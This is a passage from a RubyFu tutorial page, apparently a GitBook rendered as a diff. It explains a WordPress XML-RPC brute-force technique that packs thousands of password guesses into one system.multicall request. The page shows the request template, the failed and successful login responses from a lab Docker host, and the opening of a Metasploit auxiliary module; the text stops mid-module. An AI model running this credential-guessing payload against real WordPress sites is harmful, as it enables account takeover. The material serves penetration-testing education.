+ Module 0x5 | Exploitation Kung Fu
868
+ </a>
869
+
870
+
871
+ <ul class="articles">
872
+
873
+
874
+ <li class="chapter " data-level="5.1" data-path="module_0x5__exploitation_kung_fu/fuzzer.html">
875
+
876
+
877
+ <a href="../module_0x5__exploitation_kung_fu/fuzzer.html">
878
+
879
+ <i class="fa fa-check"></i>
880
+
881
+ <b>5.1.</b>
882
+
883
+ Fuzzer
884
+ </a>
885
+
886
+
887
+ </li>
888
+
889
+ <li class="chapter " data-level="5.2" data-path="module_0x5__exploitation_kung_fu/metasploit.html">
890
+
891
+
892
+ <a href="../module_0x5__exploitation_kung_fu/metasploit.html">
893
+
894
+ <i class="fa fa-check"></i>
895
+
896
+ <b>5.2.</b>
897
+
898
+ Metasploit
899
+ </a>
900
+
901
+
902
+ <ul class="articles">
903
+
904
+
905
+ <li class="chapter active" data-level="5.2.1" data-path="module_0x5__exploitation_kung_fu/auxiliary_module.html">
906
+
907
+
908
+ <a href="../module_0x5__exploitation_kung_fu/auxiliary_module.html">
909
+
910
+ <i class="fa fa-check"></i>
911
+
912
+ <b>5.2.1.</b>
913
+
914
+ Auxiliary module
915
+ </a>
916
+
917
+
918
+ </li>
919
+
920
+ <li class="chapter " data-level="5.2.2" data-path="module_0x5__exploitation_kung_fu/exploit_module.html">
921
+
922
+
923
+ <a href="../module_0x5__exploitation_kung_fu/exploit_module.html">
924
+
925
+ <i class="fa fa-check"></i>
926
+
927
+ <b>5.2.2.</b>
928
+
929
+ Exploit module
930
+ </a>
931
+
932
+
933
+ </li>
934
+
935
+ <li class="chapter " data-level="5.2.3" data-path="module_0x5__exploitation_kung_fu/meterpreter.html">
936
+
937
+
938
+ <a href="../module_0x5__exploitation_kung_fu/meterpreter.html">
939
+
940
+ <i class="fa fa-check"></i>
941
+
942
+ <b>5.2.3.</b>
943
+
944
+ Meterpreter
945
+ </a>
946
+
947
+
948
+ <ul class="articles">
949
+
950
+
951
+ <li class="chapter " data-level="5.2.3.1" data-path="module_0x5__exploitation_kung_fu/extensions.html">
952
+
953
+
954
+ <a href="../module_0x5__exploitation_kung_fu/extensions.html">
955
+
956
+ <i class="fa fa-check"></i>
957
+
958
+ <b>5.2.3.1.</b>
959
+
960
+ API and Extensions
961
+ </a>
962
+
963
+
964
+ </li>
965
+
966
+ <li class="chapter " data-level="5.2.3.2" data-path="module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
967
+
968
+
969
+ <a href="../module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
970
+
971
+ <i class="fa fa-check"></i>
972
+
973
+ <b>5.2.3.2.</b>
974
+
975
+ Meterpreter Scripting
976
+ </a>
977
+
978
+
979
+ </li>
980
+
981
+ <li class="chapter " data-level="5.2.3.3" data-path="module_0x5__exploitation_kung_fu/railgun_api_extension.html">
982
+
983
+
984
+ <a href="../module_0x5__exploitation_kung_fu/railgun_api_extension.html">
985
+
986
+ <i class="fa fa-check"></i>
987
+
988
+ <b>5.2.3.3.</b>
989
+
990
+ Railgun API Extension
991
+ </a>
992
+
993
+
994
+ </li>
995
+
996
+
997
+ </ul>
998
+
999
+ </li>
1000
+
1001
+
1002
+ </ul>
1003
+
1004
+ </li>
1005
+
1006
+ <li class="chapter " data-level="5.3" data-path="module_0x5__exploitation_kung_fu/metasm.html">
1007
+
1008
+
1009
+ <a href="../module_0x5__exploitation_kung_fu/metasm.html">
1010
+
1011
+ <i class="fa fa-check"></i>
1012
+
1013
+ <b>5.3.</b>
1014
+
1015
+ metasm
1016
+ </a>
1017
+
1018
+
1019
+ </li>
1020
+
1021
+
1022
+ </ul>
1023
+
1024
+ </li>
1025
+
1026
+ <li class="chapter " data-level="6" data-path="module_0x6__forensic/index.html">
1027
+
1028
+
1029
+ <a href="../module_0x6__forensic/index.html">
1030
+
1031
+ <i class="fa fa-check"></i>
1032
+
1033
+ <b>6.</b>
1034
+
1035
+ Module 0x6 | Forensic Kung Fu
1036
+ </a>
1037
+
1038
+
1039
+ <ul class="articles">
1040
+
1041
+
1042
+ <li class="chapter " data-level="6.1" data-path="module_0x6__forensic/windows_forensic.html">
1043
+
1044
+
1045
+ <a href="../module_0x6__forensic/windows_forensic.html">
1046
+
1047
+ <i class="fa fa-check"></i>
1048
+
1049
+ <b>6.1.</b>
1050
+
1051
+ Windows Forensic
1052
+ </a>
1053
+
1054
+
1055
+ </li>
1056
+
1057
+ <li class="chapter " data-level="6.2" data-path="module_0x6__forensic/android_forensic.html">
1058
+
1059
+
1060
+ <a href="../module_0x6__forensic/android_forensic.html">
1061
+
1062
+ <i class="fa fa-check"></i>
1063
+
1064
+ <b>6.2.</b>
1065
+
1066
+ Android Forensic
1067
+ </a>
1068
+
1069
+
1070
+ </li>
1071
+
1072
+ <li class="chapter " data-level="6.3" data-path="module_0x3__network_kung_fu/network_traffic_analysis.html">
1073
+
1074
+
1075
+ <a href="../module_0x3__network_kung_fu/network_traffic_analysis.html">
1076
+
1077
+ <i class="fa fa-check"></i>
1078
+
1079
+ <b>6.3.</b>
1080
+
1081
+ Network Traffic Analysis
1082
+ </a>
1083
+
1084
+
1085
+ </li>
1086
+
1087
+ <li class="chapter " data-level="6.4" data-path="module_0x6__forensic/parsing_log_files.html">
1088
+
1089
+
1090
+ <a href="../module_0x6__forensic/parsing_log_files.html">
1091
+
1092
+ <i class="fa fa-check"></i>
1093
+
1094
+ <b>6.4.</b>
1095
+
1096
+ Parsing Log Files
1097
+ </a>
1098
+
1099
+
1100
+ </li>
1101
+
1102
+
1103
+ </ul>
1104
+
1105
+ </li>
1106
+
1107
+ <li class="chapter " data-level="7" data-path="references/index.html">
1108
+
1109
+
1110
+ <a href="../references/index.html">
1111
+
1112
+ <i class="fa fa-check"></i>
1113
+
1114
+ <b>7.</b>
1115
+
1116
+ References
1117
+ </a>
1118
+
1119
+
1120
+ </li>
1121
+
1122
+ <li class="chapter " data-level="8" data-path="faqs/index.html">
1123
+
1124
+
1125
+ <a href="../faqs/index.html">
1126
+
1127
+ <i class="fa fa-check"></i>
1128
+
1129
+ <b>8.</b>
1130
+
1131
+ FAQs
1132
+ </a>
1133
+
1134
+
1135
+ </li>
1136
+
1137
+ <li class="chapter " data-level="9" data-path="contributors/index.html">
1138
+
1139
+
1140
+ <a href="../contributors/index.html">
1141
+
1142
+ <i class="fa fa-check"></i>
1143
+
1144
+ <b>9.</b>
1145
+
1146
+ Contributors
1147
+ </a>
1148
+
1149
+
1150
+ <ul class="articles">
1151
+
1152
+
1153
+ <li class="chapter " data-level="9.1" data-path="contributors/todo.html">
1154
+
1155
+
1156
+ <a href="../contributors/todo.html">
1157
+
1158
+ <i class="fa fa-check"></i>
1159
+
1160
+ <b>9.1.</b>
1161
+
1162
+ TODO
1163
+ </a>
1164
+
1165
+
1166
+ </li>
1167
+
1168
+
1169
+ </ul>
1170
+
1171
+ </li>
1172
+
1173
+
1174
+
1175
+
1176
+ <li class="divider"></li>
1177
+ <li>
1178
+ <a href="https://www.gitbook.com" target="blank" class="gitbook-link">
1179
+ Published with GitBook
1180
+ </a>
1181
+ </li>
1182
+
1183
+ </ul>
1184
+ </nav>
1185
+ </div>
1186
+
1187
+ <div class="book-body">
1188
+ <div class="body-inner">
1189
+ <div class="book-header" role="navigation">
1190
+ <!-- Actions Left -->
1191
+
1192
+
1193
+ <!-- Title -->
1194
+ <h1>
1195
+ <i class="fa fa-circle-o-notch fa-spin"></i>
1196
+ <a href="../" >RubyFu</a>
1197
+ </h1>
1198
+ </div>
1199
+
1200
+ <div class="page-wrapper" tabindex="-1" role="main">
1201
+ <div class="page-inner">
1202
+
1203
+
1204
+ <section class="normal" id="section-">
1205
+
1206
+ <h1 id="auxiliary-module"><a name="auxiliary-module" class="plugin-anchor" href="#auxiliary-module"><span class="fa fa-link"></span></a>Auxiliary module</h1>
1207
+ <h2 id="scanner"><a name="scanner" class="plugin-anchor" href="#scanner"><span class="fa fa-link"></span></a>Scanner</h2>
1208
+ <p>Basic Scanner modules</p>
1209
+ <h3 id="wordpress-xmlrpc-massive-brute-force"><a name="wordpress-xmlrpc-massive-brute-force" class="plugin-anchor" href="#wordpress-xmlrpc-massive-brute-force"><span class="fa fa-link"></span></a>WordPress XML-RPC Massive Brute Force</h3>
1210
+ <p>WordPress CMS framework support XML-RPC service to interact with almost all functions in the framework. Some functions require authentication. The main issues lies in the you can authenticate many times within the same request. WordPress accepts about 1788 lines of XML request which allows us to send tremendous number of login tries in a single request. So how awesome is this? Let me explain. </p>
1211
+ <p>Imagine that you have to brute force one user with 6000 passwords? How many requests you have to send in the normal brute force technique? It&apos;s 6000 requests. Using our module will need to 4 requests only of you use the default CHUNKSIZE which is 1500 password per request!!!. NO MULTI-THREADING even you use multi-threading in the traditional brute force technique you&apos;ll send 6000 request a few of its are parallel.</p>
1212
+ <pre><code class="lang-xml"><span class="hljs-pi">&lt;?xml version=&quot;1.0&quot;?&gt;</span>
1213
+ <span class="hljs-tag">&lt;<span class="hljs-title">methodCall</span>&gt;</span>
1214
+ <span class="hljs-tag">&lt;<span class="hljs-title">methodName</span>&gt;</span>system.multicall<span class="hljs-tag">&lt;/<span class="hljs-title">methodName</span>&gt;</span>
1215
+ <span class="hljs-tag">&lt;<span class="hljs-title">params</span>&gt;</span>
1216
+ <span class="hljs-tag">&lt;<span class="hljs-title">param</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">array</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">data</span>&gt;</span>
1217
+
1218
+
1219
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">struct</span>&gt;</span>
1220
+ <span class="hljs-tag">&lt;<span class="hljs-title">member</span>&gt;</span>
1221
+ <span class="hljs-tag">&lt;<span class="hljs-title">name</span>&gt;</span>methodName<span class="hljs-tag">&lt;/<span class="hljs-title">name</span>&gt;</span>
1222
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">string</span>&gt;</span>wp.getUsersBlogs<span class="hljs-tag">&lt;/<span class="hljs-title">string</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1223
+ <span class="hljs-tag">&lt;/<span class="hljs-title">member</span>&gt;</span>
1224
+ <span class="hljs-tag">&lt;<span class="hljs-title">member</span>&gt;</span>
1225
+ <span class="hljs-tag">&lt;<span class="hljs-title">name</span>&gt;</span>params<span class="hljs-tag">&lt;/<span class="hljs-title">name</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">array</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">data</span>&gt;</span>
1226
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">array</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">data</span>&gt;</span>
1227
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">string</span>&gt;</span>&quot;USER #1&quot;<span class="hljs-tag">&lt;/<span class="hljs-title">string</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1228
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">string</span>&gt;</span>&quot;PASS #1&quot;<span class="hljs-tag">&lt;/<span class="hljs-title">string</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1229
+ <span class="hljs-tag">&lt;/<span class="hljs-title">data</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-title">array</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1230
+ <span class="hljs-tag">&lt;/<span class="hljs-title">data</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-title">array</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1231
+ <span class="hljs-tag">&lt;/<span class="hljs-title">member</span>&gt;</span>
1232
+
1233
+ ...Snippet...
1234
+
1235
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">struct</span>&gt;</span>
1236
+ <span class="hljs-tag">&lt;<span class="hljs-title">member</span>&gt;</span>
1237
+ <span class="hljs-tag">&lt;<span class="hljs-title">name</span>&gt;</span>methodName<span class="hljs-tag">&lt;/<span class="hljs-title">name</span>&gt;</span>
1238
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">string</span>&gt;</span>wp.getUsersBlogs<span class="hljs-tag">&lt;/<span class="hljs-title">string</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1239
+ <span class="hljs-tag">&lt;/<span class="hljs-title">member</span>&gt;</span>
1240
+ <span class="hljs-tag">&lt;<span class="hljs-title">member</span>&gt;</span>
1241
+ <span class="hljs-tag">&lt;<span class="hljs-title">name</span>&gt;</span>params<span class="hljs-tag">&lt;/<span class="hljs-title">name</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">array</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">data</span>&gt;</span>
1242
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">array</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">data</span>&gt;</span>
1243
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">string</span>&gt;</span>&quot;USER #1&quot;<span class="hljs-tag">&lt;/<span class="hljs-title">string</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1244
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">string</span>&gt;</span>&quot;PASS #N&quot;<span class="hljs-tag">&lt;/<span class="hljs-title">string</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1245
+ <span class="hljs-tag">&lt;/<span class="hljs-title">data</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-title">array</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1246
+ <span class="hljs-tag">&lt;/<span class="hljs-title">data</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-title">array</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1247
+ <span class="hljs-tag">&lt;/<span class="hljs-title">member</span>&gt;</span>
1248
+
1249
+
1250
+ <span class="hljs-tag">&lt;/<span class="hljs-title">params</span>&gt;</span>
1251
+ <span class="hljs-tag">&lt;/<span class="hljs-title">methodCall</span>&gt;</span>
1252
+ </code></pre>
1253
+ <p>So from above you can understand how the XML request will be build. Now How the reply will be?
1254
+ To simplify this we&apos;ll test a single user once with wrong password another with correct password to understand the response behavior </p>
1255
+ <p><strong>wrong password response</strong></p>
1256
+ <pre><code class="lang-xml"><span class="hljs-pi">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;</span>
1257
+ <span class="hljs-tag">&lt;<span class="hljs-title">methodResponse</span>&gt;</span>
1258
+ <span class="hljs-tag">&lt;<span class="hljs-title">params</span>&gt;</span>
1259
+ <span class="hljs-tag">&lt;<span class="hljs-title">param</span>&gt;</span>
1260
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span>
1261
+ <span class="hljs-tag">&lt;<span class="hljs-title">array</span>&gt;</span>
1262
+ <span class="hljs-tag">&lt;<span class="hljs-title">data</span>&gt;</span>
1263
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span>
1264
+ <span class="hljs-tag">&lt;<span class="hljs-title">struct</span>&gt;</span>
1265
+ <span class="hljs-tag">&lt;<span class="hljs-title">member</span>&gt;</span>
1266
+ <span class="hljs-tag">&lt;<span class="hljs-title">name</span>&gt;</span>faultCode<span class="hljs-tag">&lt;/<span class="hljs-title">name</span>&gt;</span>
1267
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span>
1268
+ <span class="hljs-tag">&lt;<span class="hljs-title">int</span>&gt;</span>403<span class="hljs-tag">&lt;/<span class="hljs-title">int</span>&gt;</span>
1269
+ <span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1270
+ <span class="hljs-tag">&lt;/<span class="hljs-title">member</span>&gt;</span>
1271
+ <span class="hljs-tag">&lt;<span class="hljs-title">member</span>&gt;</span>
1272
+ <span class="hljs-tag">&lt;<span class="hljs-title">name</span>&gt;</span>faultString<span class="hljs-tag">&lt;/<span class="hljs-title">name</span>&gt;</span>
1273
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span>
1274
+ <span class="hljs-tag">&lt;<span class="hljs-title">string</span>&gt;</span>Incorrect username or password.<span class="hljs-tag">&lt;/<span class="hljs-title">string</span>&gt;</span>
1275
+ <span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1276
+ <span class="hljs-tag">&lt;/<span class="hljs-title">member</span>&gt;</span>
1277
+ <span class="hljs-tag">&lt;/<span class="hljs-title">struct</span>&gt;</span>
1278
+ <span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1279
+ <span class="hljs-tag">&lt;/<span class="hljs-title">data</span>&gt;</span>
1280
+ <span class="hljs-tag">&lt;/<span class="hljs-title">array</span>&gt;</span>
1281
+ <span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1282
+ <span class="hljs-tag">&lt;/<span class="hljs-title">param</span>&gt;</span>
1283
+ <span class="hljs-tag">&lt;/<span class="hljs-title">params</span>&gt;</span>
1284
+ <span class="hljs-tag">&lt;/<span class="hljs-title">methodResponse</span>&gt;</span>
1285
+ </code></pre>
1286
+ <p>We noticed the following </p>
1287
+ <ul>
1288
+ <li><code>&lt;name&gt;faultCode&lt;/name&gt;</code></li>
1289
+ <li><code>&lt;int&gt;403&lt;/int&gt;</code></li>
1290
+ <li><code>&lt;string&gt;Incorrect username or password.&lt;/string&gt;</code></li>
1291
+ </ul>
1292
+ <p>Usually we rely one the string response &apos;<em>Incorrect username or password.</em>&apos;, but what if the WordPress language wasn&apos;t English? so the best thing is the integer response which is <code>403</code></p>
1293
+ <p><strong>correct password response</strong></p>
1294
+ <pre><code class="lang-xml"><span class="hljs-pi">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;</span>
1295
+ <span class="hljs-tag">&lt;<span class="hljs-title">methodResponse</span>&gt;</span>
1296
+ <span class="hljs-tag">&lt;<span class="hljs-title">params</span>&gt;</span>
1297
+ <span class="hljs-tag">&lt;<span class="hljs-title">param</span>&gt;</span>
1298
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span>
1299
+ <span class="hljs-tag">&lt;<span class="hljs-title">array</span>&gt;</span>
1300
+ <span class="hljs-tag">&lt;<span class="hljs-title">data</span>&gt;</span>
1301
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span>
1302
+ <span class="hljs-tag">&lt;<span class="hljs-title">array</span>&gt;</span>
1303
+ <span class="hljs-tag">&lt;<span class="hljs-title">data</span>&gt;</span>
1304
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span>
1305
+ <span class="hljs-tag">&lt;<span class="hljs-title">array</span>&gt;</span>
1306
+ <span class="hljs-tag">&lt;<span class="hljs-title">data</span>&gt;</span>
1307
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span>
1308
+ <span class="hljs-tag">&lt;<span class="hljs-title">struct</span>&gt;</span>
1309
+ <span class="hljs-tag">&lt;<span class="hljs-title">member</span>&gt;</span>
1310
+ <span class="hljs-tag">&lt;<span class="hljs-title">name</span>&gt;</span>isAdmin<span class="hljs-tag">&lt;/<span class="hljs-title">name</span>&gt;</span>
1311
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span>
1312
+ <span class="hljs-tag">&lt;<span class="hljs-title">boolean</span>&gt;</span>1<span class="hljs-tag">&lt;/<span class="hljs-title">boolean</span>&gt;</span>
1313
+ <span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1314
+ <span class="hljs-tag">&lt;/<span class="hljs-title">member</span>&gt;</span>
1315
+ <span class="hljs-tag">&lt;<span class="hljs-title">member</span>&gt;</span>
1316
+ <span class="hljs-tag">&lt;<span class="hljs-title">name</span>&gt;</span>url<span class="hljs-tag">&lt;/<span class="hljs-title">name</span>&gt;</span>
1317
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span>
1318
+ <span class="hljs-tag">&lt;<span class="hljs-title">string</span>&gt;</span>http://172.17.0.3/<span class="hljs-tag">&lt;/<span class="hljs-title">string</span>&gt;</span>
1319
+ <span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1320
+ <span class="hljs-tag">&lt;/<span class="hljs-title">member</span>&gt;</span>
1321
+ <span class="hljs-tag">&lt;<span class="hljs-title">member</span>&gt;</span>
1322
+ <span class="hljs-tag">&lt;<span class="hljs-title">name</span>&gt;</span>blogid<span class="hljs-tag">&lt;/<span class="hljs-title">name</span>&gt;</span>
1323
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span>
1324
+ <span class="hljs-tag">&lt;<span class="hljs-title">string</span>&gt;</span>1<span class="hljs-tag">&lt;/<span class="hljs-title">string</span>&gt;</span>
1325
+ <span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1326
+ <span class="hljs-tag">&lt;/<span class="hljs-title">member</span>&gt;</span>
1327
+ <span class="hljs-tag">&lt;<span class="hljs-title">member</span>&gt;</span>
1328
+ <span class="hljs-tag">&lt;<span class="hljs-title">name</span>&gt;</span>blogName<span class="hljs-tag">&lt;/<span class="hljs-title">name</span>&gt;</span>
1329
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span>
1330
+ <span class="hljs-tag">&lt;<span class="hljs-title">string</span>&gt;</span>Docker wordpress<span class="hljs-tag">&lt;/<span class="hljs-title">string</span>&gt;</span>
1331
+ <span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1332
+ <span class="hljs-tag">&lt;/<span class="hljs-title">member</span>&gt;</span>
1333
+ <span class="hljs-tag">&lt;<span class="hljs-title">member</span>&gt;</span>
1334
+ <span class="hljs-tag">&lt;<span class="hljs-title">name</span>&gt;</span>xmlrpc<span class="hljs-tag">&lt;/<span class="hljs-title">name</span>&gt;</span>
1335
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span>
1336
+ <span class="hljs-tag">&lt;<span class="hljs-title">string</span>&gt;</span>http://172.17.0.3/xmlrpc.php<span class="hljs-tag">&lt;/<span class="hljs-title">string</span>&gt;</span>
1337
+ <span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1338
+ <span class="hljs-tag">&lt;/<span class="hljs-title">member</span>&gt;</span>
1339
+ <span class="hljs-tag">&lt;/<span class="hljs-title">struct</span>&gt;</span>
1340
+ <span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1341
+ <span class="hljs-tag">&lt;/<span class="hljs-title">data</span>&gt;</span>
1342
+ <span class="hljs-tag">&lt;/<span class="hljs-title">array</span>&gt;</span>
1343
+ <span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1344
+ <span class="hljs-tag">&lt;/<span class="hljs-title">data</span>&gt;</span>
1345
+ <span class="hljs-tag">&lt;/<span class="hljs-title">array</span>&gt;</span>
1346
+ <span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1347
+ <span class="hljs-tag">&lt;/<span class="hljs-title">data</span>&gt;</span>
1348
+ <span class="hljs-tag">&lt;/<span class="hljs-title">array</span>&gt;</span>
1349
+ <span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1350
+ <span class="hljs-tag">&lt;/<span class="hljs-title">param</span>&gt;</span>
1351
+ <span class="hljs-tag">&lt;/<span class="hljs-title">params</span>&gt;</span>
1352
+ <span class="hljs-tag">&lt;/<span class="hljs-title">methodResponse</span>&gt;</span>
1353
+ </code></pre>
1354
+ <p>We noticed that long reply with the result of called method <code>wp.getUsersBlogs</code></p>
1355
+ <p>Awesome, right?</p>
1356
+ <p>The tricky part is just begun! Since we will be sending thousands of passwords in one request and the reply will be rally huge XML files, how we&apos;ll find the position of the correct credentials? The answer is, by using the powerful ruby iteration methods, particularly <code>each_with_index</code> method.</p>
1357
+ <p>Enough talking, show me the code!</p>
1358
+ <h4 id="what-do-we-want"><a name="what-do-we-want" class="plugin-anchor" href="#what-do-we-want"><span class="fa fa-link"></span></a>What do we want?</h4>
1359
+ <ul>
1360
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Create Auxiliary module</li>
1361
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Deal with Web Application </li>
1362
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Deal with WordPress </li>
1363
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Describe The module</li>
1364
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Let people know we created this module</li>
1365
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Add references about the vulnerability that we exploit</li>
1366
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Options to set the target URI, port, user, pass list.</li>
1367
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Read username and password lists as arrays </li>
1368
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Build/Generate XML file takes a user and iterate around the passwords</li>
1369
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Check if target is running WordPress </li>
1370
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Check if target enabling RPC</li>
1371
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Setup the HTTP with XML POST request</li>
1372
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Parse XML request and response </li>
1373
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Find the exact correct credentials </li>
1374
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Check if we got blocked</li>
1375
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Parsing the result and find which password is correct </li>
1376
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Check if the module has been written correctly (msftidy.rb)</li>
1377
+ </ul>
1378
+ <h4 id="steps"><a name="steps" class="plugin-anchor" href="#steps"><span class="fa fa-link"></span></a>Steps</h4>
1379
+ <ul>
1380
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Create Auxiliary module</li>
1381
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Deal with Web Application </li>
1382
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Deal with WordPress </li>
1383
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Describe The module</li>
1384
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Let people know we created this module</li>
1385
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Add references about the vulnerability that we exploit</li>
1386
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Options to set the target URI, port, user, pass list.</li>
1387
+ </ul>
1388
+ <pre><code class="lang-ruby"><span class="hljs-comment">##</span>
1389
+ <span class="hljs-comment"># This module requires Metasploit: http://www.metasploit.com/download</span>
1390
+ <span class="hljs-comment"># Current source: https://github.com/rapid7/metasploit-framework</span>
1391
+ <span class="hljs-comment">##</span>
1392
+
1393
+ <span class="hljs-keyword">require</span> <span class="hljs-string">&apos;msf/core&apos;</span>
1394
+
1395
+ <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Metasploit3</span> <span class="hljs-inheritance">&lt; <span class="hljs-parent">Msf::Auxiliary</span></span></span>
1396
+ <span class="hljs-keyword">include</span> <span class="hljs-constant">Msf::Exploit::Remote::HttpClient</span>
1397
+ <span class="hljs-keyword">include</span> <span class="hljs-constant">Msf::Exploit::Remote::HTTP::Wordpress</span>
1398
+
1399
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">initialize</span><span class="hljs-params">(info = {})</span></span>
1400
+ <span class="hljs-keyword">super</span>(update_info(
1401
+ info,
1402
+ <span class="hljs-string">&apos;Name&apos;</span> =&gt; <span class="hljs-string">&apos;WordPress XML-RPC Massive Brute Force&apos;</span>,
1403
+ <span class="hljs-string">&apos;Description&apos;</span> =&gt; <span class="hljs-string">%q{WordPress massive brute force attacks via WordPress XML-RPC service.}</span>,
1404
+ <span class="hljs-string">&apos;License&apos;</span> =&gt; <span class="hljs-constant">MSF_LICENSE</span>,
1405
+ <span class="hljs-string">&apos;Author&apos;</span> =&gt;
1406
+ [
1407
+ <span class="hljs-string">&apos;Sabri (@KINGSABRI)&apos;</span>, <span class="hljs-comment"># Module Writer</span>
1408
+ <span class="hljs-string">&apos;William (WCoppola@Lares.com)&apos;</span> <span class="hljs-comment"># Module Requester</span>
1409
+ ],
1410
+ <span class="hljs-string">&apos;References&apos;</span> =&gt;
1411
+ [
1412
